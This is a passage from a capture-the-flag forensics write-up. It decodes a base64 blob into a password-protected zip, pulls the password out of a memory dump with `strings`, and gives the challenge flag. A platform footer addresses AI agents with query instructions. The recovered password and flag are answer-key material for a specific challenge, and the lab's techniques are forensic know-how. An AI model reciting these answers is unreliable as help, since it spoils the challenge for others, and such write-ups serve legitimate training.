k43OCM0JqPYAuj1Di5RmwrIUg+5uGCBxSojbJLheZe21wwm9YDjm6IkQwMHi13f5jEJTd+v3vK8uL9bBm4SAONMbNSv3NNjJazlTLHHYYT0e7BYI0Gwtup3w3f5+6tdQGXBlIWTOu2pM4sj1rHQ0bTOgIObxTYPxetqJuS6Jynzz4IhJ2NqpG98SV7RsG23OUkwQW1UG/I1UxyYUSgsiTkws7CFpTUV6MtI0FLcnFToyQiDE5lS8mkAv/nt0wmsiMdX31SqdvwXKdiEp0TAwk8jyXQfwFZw7aBYfW1W4Mrx6xfQd1IJENh2v4slHMybHGTtxpofLg6LhF/drhNeAHHaAubL+ATUmpfMiWo/ykYTPw241Hfi0tIz3OwF/BEfXAj6h+Vr+KPXQ+6lDRvMdzAJrT9U7jbOWsrdqCW2iLkQTkncBBqPDFG4UUpIeE/3rnhxIlhvvvgiBk+xNWtg0vbj8JJLaP7ChHLcW+soPHwldrE1Kci7WA/SbPwGPnHJVMLkr/lQSwECPwMzAAEAYwBojcJYAAAAAIk1AACMNwAACAAvAAAAAAAAACCApIEAAAAAZmxhZy5qcGcKACAAAAAAAAEAGAC9z+3fNbXaAQAAAAAAAAAAAAAAAAAAAAABmQcAAgBBRQEIAFBLBQYAAAAAAQABAGUAAAC6NQAAAAA="
out = open("dump.zip", "wb")
print(out.write(base64.b64decode(a)))
```
At first i tried to do bruteforce but i can't find valid password. So i chose to dump the strings on memory then find some string related to "password".
```bash
strings memdump.mem > dump
strings -e l memdump.mem > dumpl
```
On dumpl i found interesting string related to password.
Use "Samaqlo\@Akasex777" as the password and got flag.jpg.
Looks like flag.jpg doesnt show flag, lets try to do some stegano stuff.
Flag: AKASEC{05-10-2023\_free\_palestine}
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://kos0ng.gitbook.io/ctfs/write-up/2024/akasec-ctf/forensic.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.